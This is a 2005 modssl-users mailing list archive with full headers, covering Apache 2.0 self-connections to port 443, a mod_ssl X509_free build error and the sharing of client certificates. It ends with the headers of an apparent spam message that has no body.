  by localhost with SMTP; 25 Aug 2005 08:41:53 -0000
Received: (qmail 30194 invoked by uid 30); 25 Aug 2005 08:41:52 -0000
Date: 25 Aug 2005 08:41:52 -0000
Message-ID: <20050825084152.30193.qmail@cappuccino.hostingprojekt.net>
To: 
Subject: strange connections to apache2 port 443
From: "Tom Henderson" <2005mlm@gmx.net>
X-Received: from gw.qsc.de (gw.qsc.de [213.148.128.70]) 
	by cappuccino.hostingprojekt.net with HTTP; 25 Aug 2005 10:41:52 +0200
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
X-MimeOLE: Produced by hostingprojekt.net WebMail
X-Mailer: hostingprojekt.net WebMail ( like Microsoft Outlook ) Brainpowdered by Confixx3 WebMail
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd and clamav at cappuccino.hostingprojekt.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tom Henderson" <2005mlm@gmx.net>
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I hope that I describe my problem to the right mailinglist and that
someone can give me the hint I need.

I´m running a SuSE Linux 9.0 with Apache2 2.0.53 ( installed via rpm
from ftp.suse.com ) with mod_ssl. The startup parameter for the apache
is "-D SSL".

But here comes my problem ... I´m also running an iptables firewall and
I notice a strange behaviour on my system but only when I start apache
with "-D SSL". When I run apache only with http there are no strange
connection attempts in the firewall logs.

To be more precise, my firewall logs show entries of connection attampts
from my localhost to my localhost via interface lo ( not eth0 ) from
some increacing port to port 443.

Fact is that this connections only appear when I start the apache with
"-D SSL" and I can also comment out all the virtual hosts for port 443
but that does not matter, only when I start the apache without SSL the
connections disappear.
The strange thing is that in the firewall logs there are syn, ack ...
flags but I can not find any apache2-logfile entry for one of this
connections.

Does that sound familiar to somebody?
Is there a configuration withtin the apache2 to probe the ssl aware
apache?

Kind regards

Tom


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 29 16:02:28 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1861F14D9BE; Mon, 29 Aug 2005 16:02:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from zproxy.gmail.com (zproxy.gmail.com [64.233.162.200])
	by master.modssl.org (Postfix) with ESMTP id 32E9514D97A
	for ; Mon, 29 Aug 2005 16:02:24 +0200 (CEST)
Received: by zproxy.gmail.com with SMTP id i11so581777nzh
        for ; Mon, 29 Aug 2005 07:02:22 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=TFZEr0QFx3TRlE/4rSBkAct3Gt/litwXKgzLUS/FW4AASyT4XWoHRWY8ZA6t4z3YZ6S6srPwsujOex8zlYjsl4tQYCGwvnb7qpEO2W5Im58YewVoAGd+DrtJX2AxRHtlug22QP+wt+ebgvUksNiGmvYao0+ZafLXGcH2Q4Cx7+Y=
Received: by 10.36.20.7 with SMTP id 7mr928479nzt;
        Mon, 29 Aug 2005 07:02:22 -0700 (PDT)
Received: by 10.36.5.10 with HTTP; Mon, 29 Aug 2005 07:02:22 -0700 (PDT)
Message-ID: <9eea8b15050829070226904b0@mail.gmail.com>
Date: Mon, 29 Aug 2005 19:32:22 +0530
From: Toney Samuel 
To: modssl-users@modssl.org
Subject: undefined symbol: X509_free
Cc: openssl-users@openssl.org, toneys@gmail.com
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Toney Samuel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

i have downloaded openssl-0.9.8.tar.gz. I untared it then configured
it with these switches
./config --prefix=3D/usr/local shared zlib-dynamic
then did make and make install

i had apache httpd-2.0.53.tar.gz also untared it then used these
switches to configure
./configure  --enable-deflate  --enable-usertrack  --enable-auth-dbm=20
--enable-mime-magic \
--enable-expires  -disable-autoindex  --enable-so  --enable-cern-meta=20
--enable-ssl \
--enable-mods-shared=3Dssl --with-ssl=3D/usr/local/bin
then did make and make install

but when i start apache with=20
./apachectl startssl
I am getting this error
cluster1:/usr/local/apache2/bin # ./apachectl startssl
Syntax error on line 234 of /usr/local/apache2/conf/httpd.conf:
Cannot load /usr/local/apache2/modules/mod_ssl.so into server:
/usr/local/apache2/modules/mod_ssl.so: undefined symbol: X509_free
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 29 16:05:16 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3CB2414D9BE; Mon, 29 Aug 2005 16:05:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sbserver.css.local (host217-34-12-1.in-addr.btopenworld.com [217.34.12.1])
	by master.modssl.org (Postfix) with ESMTP id B037F14D97A
	for ; Mon, 29 Aug 2005 16:05:02 +0200 (CEST)
Received: from sbserver.css.local ([10.0.0.2]) by sbserver.css.local with Microsoft SMTPSVC(5.0.2195.6713);
	 Mon, 29 Aug 2005 15:15:54 +0100
Received: by sbserver.css.local (Microsoft Connector for POP3 Mailboxes 5.00.2195) with SMTP (Global POP3 Download)
	 id MSG08292005-151551-12371.MMD@county-safety-services.com; Mon, 29 Aug 2005 15:15:51 +0100
Envelope-to: marketing@cssworksafe.com
Delivery-date: Mon, 29 Aug 2005 14:04:40 +0000
Received: from [195.30.6.154] (helo=mmx1.engelschall.com)
	by ns3.aim-internet.com with esmtp (Exim 4.52)
	id 1E9kFb-0005e9-RG
	for marketing@cssworksafe.com; Mon, 29 Aug 2005 14:04:40 +0000
Received: by mmx1.engelschall.com (Postfix)
	id C9829564C7; Mon, 29 Aug 2005 16:02:34 +0200 (CEST)
Received: from master.openssl.org (master.openssl.org [195.30.6.166])
	by mmx1.engelschall.com (Postfix) with ESMTP id BD89C564C6
	for ; Mon, 29 Aug 2005 16:02:34 +0200 (CEST)
Received: by master.openssl.org (Postfix)
	id 7E59E1AC6E5E; Mon, 29 Aug 2005 16:02:32 +0200 (CEST)
Delivered-To: openssl-users-l@master.openssl.org
Received: by master.openssl.org (Postfix, from userid 29101)
	id 7ADBA1AC6E50; Mon, 29 Aug 2005 16:02:32 +0200 (CEST)
X-Original-To: openssl-users@openssl.org
Delivered-To: openssl-users@openssl.org
Received: from zproxy.gmail.com (zproxy.gmail.com [64.233.162.203])
	by master.openssl.org (Postfix) with ESMTP id 37EB21AC6E8B
	for ; Mon, 29 Aug 2005 16:02:27 +0200 (CEST)
Received: by zproxy.gmail.com with SMTP id x7so627095nzc
        for ; Mon, 29 Aug 2005 07:02:22 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=TFZEr0QFx3TRlE/4rSBkAct3Gt/litwXKgzLUS/FW4AASyT4XWoHRWY8ZA6t4z3YZ6S6srPwsujOex8zlYjsl4tQYCGwvnb7qpEO2W5Im58YewVoAGd+DrtJX2AxRHtlug22QP+wt+ebgvUksNiGmvYao0+ZafLXGcH2Q4Cx7+Y=
Received: by 10.36.20.7 with SMTP id 7mr928479nzt;
        Mon, 29 Aug 2005 07:02:22 -0700 (PDT)
Received: by 10.36.5.10 with HTTP; Mon, 29 Aug 2005 07:02:22 -0700 (PDT)
Message-ID: <9eea8b15050829070226904b0@mail.gmail.com>
Date: Mon, 29 Aug 2005 19:32:22 +0530
From: Toney Samuel 
To: modssl-users@modssl.org
Subject: undefined symbol: X509_free
Cc: openssl-users@openssl.org, toneys@gmail.com
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
X-Sender: Toney Samuel 
X-List-Manager: OpenSSL Majordomo [version 1.94.5]
X-List-Name: openssl-users
X-OriginalArrivalTime: 29 Aug 2005 14:15:54.0828 (UTC) FILETIME=[2B2360C0:01C5ACA4]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Toney Samuel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

i have downloaded openssl-0.9.8.tar.gz. I untared it then configured
it with these switches
./config --prefix=3D/usr/local shared zlib-dynamic
then did make and make install

i had apache httpd-2.0.53.tar.gz also untared it then used these
switches to configure
./configure  --enable-deflate  --enable-usertrack  --enable-auth-dbm=20
--enable-mime-magic \
--enable-expires  -disable-autoindex  --enable-so  --enable-cern-meta=20
--enable-ssl \
--enable-mods-shared=3Dssl --with-ssl=3D/usr/local/bin
then did make and make install

but when i start apache with=20
./apachectl startssl
I am getting this error
cluster1:/usr/local/apache2/bin # ./apachectl startssl
Syntax error on line 234 of /usr/local/apache2/conf/httpd.conf:
Cannot load /usr/local/apache2/modules/mod_ssl.so into server:
/usr/local/apache2/modules/mod_ssl.so: undefined symbol: X509_free
______________________________________________________________________
OpenSSL Project                                 http://www.openssl.org
User Support Mailing List                    openssl-users@openssl.org
Automated List Manager                           majordomo@openssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 29 16:47:49 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 360D214D9BE; Mon, 29 Aug 2005 16:47:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.196])
	by master.modssl.org (Postfix) with ESMTP id 766A014D97A
	for ; Mon, 29 Aug 2005 16:47:47 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id i31so594742wxd
        for ; Mon, 29 Aug 2005 07:47:47 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=huUFpIadVeMSpf9Q5TuIkvjKR0d/jbmnsDsoOTVYR4lwY+nZbrOZ0aeBaNqoJUPODikdippSEYVvG89zoUFJ76H8KAuPuAaKLILJ5cFS9hqO+meeDw2fnuEM+2MIDGuv1Cjtj5Q8bjb7JbHRYNpxmbeEs5qyc7blBUW7HtxCeqo=
Received: by 10.70.96.7 with SMTP id t7mr99172wxb;
        Mon, 29 Aug 2005 07:41:02 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Mon, 29 Aug 2005 07:41:02 -0700 (PDT)
Message-ID: 
Date: Mon, 29 Aug 2005 10:41:02 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: undefined symbol: X509_free
Cc: openssl-users@openssl.org, toneys@gmail.com
In-Reply-To: <9eea8b15050829070226904b0@mail.gmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <9eea8b15050829070226904b0@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 8/29/05, Toney Samuel  wrote:
> I am getting this error
> cluster1:/usr/local/apache2/bin # ./apachectl startssl
> Syntax error on line 234 of /usr/local/apache2/conf/httpd.conf:
> Cannot load /usr/local/apache2/modules/mod_ssl.so into server:
> /usr/local/apache2/modules/mod_ssl.so: undefined symbol: X509_free

This is a long-outstanding bug in the Apache build process.  It's easy
to work around.  Please refer to
http://www.mail-archive.com/modssl-users@modssl.org/msg14344.html .

Thanks!
Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 31 10:47:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0DB7D14D9D3; Wed, 31 Aug 2005 10:47:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from coredumps.de (coredumps.de [217.160.213.75])
	by master.modssl.org (Postfix) with ESMTP id D8DC414D97D
	for ; Wed, 31 Aug 2005 10:47:40 +0200 (CEST)
Received: from port-212-202-52-119.dynamic.qsc.de ([212.202.52.119] helo=ente.berdmann.de)
	by coredumps.de with esmtpsa (TLSv1:DES-CBC3-SHA:168)
	(Exim 4.51)
	id 1EAOFw-0002Pt-FS; Wed, 31 Aug 2005 10:47:40 +0200
Received: from apollo.berdmann.de ([192.168.1.2])
	by ente.berdmann.de with esmtp (Exim 3.36 #1)
	id 1EAOFw-0001dw-00; Wed, 31 Aug 2005 10:47:40 +0200
Message-ID: <43156EAB.4050108@berdmann.de>
Date: Wed, 31 Aug 2005 10:47:39 +0200
From: Bernhard Erdmann 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.11) Gecko/20050729
X-Accept-Language: de, en, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Cc: Tom Henderson <2005mlm@gmx.net>
Subject: Re: strange connections to apache2 port 443
References: <20050825084152.30193.qmail@cappuccino.hostingprojekt.net>
In-Reply-To: <20050825084152.30193.qmail@cappuccino.hostingprojekt.net>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bernhard Erdmann 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Tom Henderson wrote:
> Hi,
> 
> I hope that I describe my problem to the right mailinglist and that
> someone can give me the hint I need.
> 
> I´m running a SuSE Linux 9.0 with Apache2 2.0.53 ( installed via rpm
> from ftp.suse.com ) with mod_ssl. The startup parameter for the apache
> is "-D SSL".
> 
> But here comes my problem ... I´m also running an iptables firewall and
> I notice a strange behaviour on my system but only when I start apache
> with "-D SSL". When I run apache only with http there are no strange
> connection attempts in the firewall logs.
> 
> To be more precise, my firewall logs show entries of connection attampts
> from my localhost to my localhost via interface lo ( not eth0 ) from
> some increacing port to port 443.
> 
> Fact is that this connections only appear when I start the apache with
> "-D SSL" and I can also comment out all the virtual hosts for port 443
> but that does not matter, only when I start the apache without SSL the
> connections disappear.
> The strange thing is that in the firewall logs there are syn, ack ...
> flags but I can not find any apache2-logfile entry for one of this
> connections.
> 
> Does that sound familiar to somebody?
> Is there a configuration withtin the apache2 to probe the ssl aware
> apache?


Hi Tom,

this is exactly what I recognized. When Apache 2.0.54 runs on RHEL AS 3 
using SSL, it opens TCP connections to itself on a regular schedule.

The connections to port 443/tcp are opened by the apache parent process 
running as root. No information is exchanged. The TCP connection is just 
opened and immediately closed (FIN sent by the "client").
This was seen by iptabling 443/tcp on interface lo and watching which 
process had connections in the SYN_SENT state.

The error_log with "LogLevel debug" shows lots of SSL handshake errors 
even when no browser causes a SSL handshake error.

Here's how apache was built:

# 22.08.05
# httpd-2.0.54
#
CFLAGS="-I/usr/kerberos/include" \
./configure \
--prefix=/opt/apache \
--sysconfdir=/etc/httpd/conf \
--enable-ssl \
--enable-mods-shared=all \
--enable-proxy \
--enable-proxy-http \
--enable-dumpio

Best regards,
Bernie
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 31 11:06:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EA6B814EADB; Wed, 31 Aug 2005 11:06:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 641DB14EAC0
	for ; Wed, 31 Aug 2005 11:06:35 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id j7V96UjP017801;
	Wed, 31 Aug 2005 05:06:30 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id j7V96TV03398;
	Wed, 31 Aug 2005 05:06:29 -0400
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.4/8.13.4/Submit) id j7V96S9T003281;
	Wed, 31 Aug 2005 10:06:28 +0100
Date: Wed, 31 Aug 2005 10:06:28 +0100
From: Joe Orton 
To: Bernhard Erdmann 
Cc: modssl-users@modssl.org, Tom Henderson <2005mlm@gmx.net>
Subject: Re: strange connections to apache2 port 443
Message-ID: <20050831090628.GA3228@redhat.com>
Mail-Followup-To: Bernhard Erdmann ,
	modssl-users@modssl.org, Tom Henderson <2005mlm@gmx.net>
References: <20050825084152.30193.qmail@cappuccino.hostingprojekt.net> <43156EAB.4050108@berdmann.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <43156EAB.4050108@berdmann.de>
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Aug 31, 2005 at 10:47:39AM +0200, Bernhard Erdmann wrote:
> this is exactly what I recognized. When Apache 2.0.54 runs on RHEL AS 3 
> using SSL, it opens TCP connections to itself on a regular schedule.

2.0 does this to wake up idle child processes, which can then exit, it's 
perfectly normal - you should modify the firewall rules to allow local 
connections to all listening ports.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 31 23:35:00 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 23B9A14EAC0; Wed, 31 Aug 2005 23:35:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lmfilto03.st1.spray.net (lmfilto03.st1.spray.net [212.78.202.217])
	by master.modssl.org (Postfix) with ESMTP id D4D0914D976
	for ; Wed, 31 Aug 2005 23:34:59 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by lmfilto03.st1.spray.net (Postfix) with ESMTP id 4C4A5264300
	for ; Wed, 31 Aug 2005 21:34:59 +0000 (GMT)
Received: from lmsmtp02.st1.spray.net ([212.78.202.112])
 by localhost (lmfilto03.st1.spray.net [212.78.202.32]) (amavisd-new, port 10024)
 with ESMTP id 17625-01 for ;
 Wed, 31 Aug 2005 21:34:59 +0000 (GMT)
Received: from [10.0.0.11] (p54BE0235.dip0.t-ipconnect.de [84.190.2.53])
	by lmsmtp02.st1.spray.net (Postfix) with ESMTP id 18CB29E
	for ; Wed, 31 Aug 2005 21:34:59 +0000 (GMT)
From: Conrad Friedrich 
Organization: unimatrix
To: modssl-users@modssl.org
Subject: preventing client certs to be used by multiple users??
Date: Wed, 31 Aug 2005 23:37:03 +0200
User-Agent: KMail/1.7.2
MIME-Version: 1.0
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200508312337.03186.conrad.friedrich@lycos.de>
X-Virus-Scanned: by amavisd-new at spray.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Conrad Friedrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
Is there a way to prevent users (that got a client ssl-certificate (pkcs12) 
for accessing my server) from giving their certs away to others and in that 
way enabling "unwanted" users access to my site?
Or if there is no elegant solution, maybe someone knows how apache (or a log 
analyzer etc.) can inform me if two different IPs have tried to connect 
simultaneously using the same certificate?

Many thanks
Conrad Friedrich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 31 23:46:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D730514D9BB; Wed, 31 Aug 2005 23:46:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lmfilto01.st1.spray.net (lmfilto01.st1.spray.net [212.78.202.65])
	by master.modssl.org (Postfix) with ESMTP id 9786F14D976
	for ; Wed, 31 Aug 2005 23:46:58 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by lmfilto01.st1.spray.net (Postfix) with ESMTP id B7E921BF81D
	for ; Wed, 31 Aug 2005 21:46:57 +0000 (GMT)
Received: from lmsmtp02.st1.spray.net ([212.78.202.112])
 by localhost (lmfilto01.st1.spray.net [212.78.202.32]) (amavisd-new, port 10024)
 with ESMTP id 24295-04 for ;
 Wed, 31 Aug 2005 21:46:57 +0000 (GMT)
Received: from [10.0.0.11] (p54BE0235.dip0.t-ipconnect.de [84.190.2.53])
	by lmsmtp02.st1.spray.net (Postfix) with ESMTP id 8A4C79E
	for ; Wed, 31 Aug 2005 21:46:57 +0000 (GMT)
From: Conrad Friedrich 
Organization: unimatrix
To: modssl-users@modssl.org
Subject: preventing client certs to be used by multiple users??
User-Agent: KMail/1.7.2
MIME-Version: 1.0
Content-Disposition: inline
Date: Wed, 31 Aug 2005 23:49:01 +0200
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <200508312349.01963.conrad.friedrich@lycos.de>
X-Virus-Scanned: by amavisd-new at spray.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Conrad Friedrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
Is there a way to prevent users (that got a client ssl-certificate (pkcs12) 
for accessing my server) from giving their certs away to others and in that 
way enabling "unwanted" users access to my site?
Or if there is no elegant solution, maybe someone knows how apache (or a log 
analyzer etc.) can inform me if two different IPs have tried to connect 
simultaneously using the same certificate?

Many thanks
Conrad Friedrich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  1 00:04:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6CA114D9BC; Thu,  1 Sep 2005 00:04:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.194])
	by master.modssl.org (Postfix) with ESMTP id 756CF14D980
	for ; Thu,  1 Sep 2005 00:04:35 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id i31so35568wxd
        for ; Wed, 31 Aug 2005 15:04:34 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=TuwTbY6u1AdkY5x1e7rAAr3ADBZITLlSy7Mmy+AgWOSMCuxqKT/5eYI9Bu/m2ft7p4+mzMHnu4Mi/1/Vph1xtrNjG87iE4xONZUubGaCT+Hpr4mHdC46bKjQk/X1j44mFL10+UWPVvWNMOrjCoXBCqsL5wwnFYzMTo0krK8x1wA=
Received: by 10.70.77.2 with SMTP id z2mr24556wxa;
        Wed, 31 Aug 2005 15:04:34 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Wed, 31 Aug 2005 15:04:34 -0700 (PDT)
Message-ID: 
Date: Wed, 31 Aug 2005 18:04:34 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: preventing client certs to be used by multiple users??
In-Reply-To: <200508312337.03186.conrad.friedrich@lycos.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <200508312337.03186.conrad.friedrich@lycos.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 8/31/05, Conrad Friedrich  wrote:
> Is there a way to prevent users (that got a client ssl-certificate (pkcs1=
2)
> for accessing my server) from giving their certs away to others and in th=
at
> way enabling "unwanted" users access to my site?

The client certificate acts as the user's identity.  If the user gives
away his/her identity or the identity is stolen, then someone else can
authenticate to the server using that identity, and that's just the
way it is.  This is no different than a username/password means of
establishing user identity, really, except that the user has perhaps
better ways to protect a client certificate than he does a
username/password.  If the user intentionally gives away the
certificate, there's nothing you can do about it.

> Or if there is no elegant solution, maybe someone knows how apache (or a =
log
> analyzer etc.) can inform me if two different IPs have tried to connect
> simultaneously using the same certificate?

I haven't seen any such tool but that doesn't mean there isn't one out
there.  Anybody else heard of such a thing?

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  1 10:53:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BE02314D9BC; Thu,  1 Sep 2005 10:53:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id 7B96B14D980
	for ; Thu,  1 Sep 2005 10:53:11 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Thu, 01 Sep 2005 10:52:38 +0200
Message-ID: <000e01c5aed2$837c1700$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: <200508312349.01963.conrad.friedrich@lycos.de>
Subject: Re: preventing client certs to be used by multiple users??
Date: Thu, 1 Sep 2005 10:52:42 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


----- Original Message ----- 
From: "Conrad Friedrich" 
To: 
Sent: Wednesday, August 31, 2005 11:49 PM
Subject: preventing client certs to be used by multiple users??


> Hello,
> Is there a way to prevent users (that got a client ssl-certificate
(pkcs12)
> for accessing my server) from giving their certs away to others and in
that
> way enabling "unwanted" users access to my site?
> Or if there is no elegant solution, maybe someone knows how apache (or a
log
> analyzer etc.) can inform me if two different IPs have tried to connect
> simultaneously using the same certificate?
>
> Many thanks
> Conrad Friedrich

The other replies pretty much says it all. If you're trying to prevent
people from sharing their access to your data then have them sign
some papers instead.
Certificates and login credentials just won't do that for you.

/Daniel


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  2 08:01:14 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3469414D9BC; Fri,  2 Sep 2005 08:01:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.30.6.168 (dsl-Chn-static-162.40.101.203.touchtelindia.net [203.101.40.162])
	by master.modssl.org (Postfix) with SMTP id 0CCF214D987
	for ; Fri,  2 Sep 2005 08:01:12 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: Re: Why?! BackSex.mpeg
Date: 02 Sep 2005 11:30:53 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
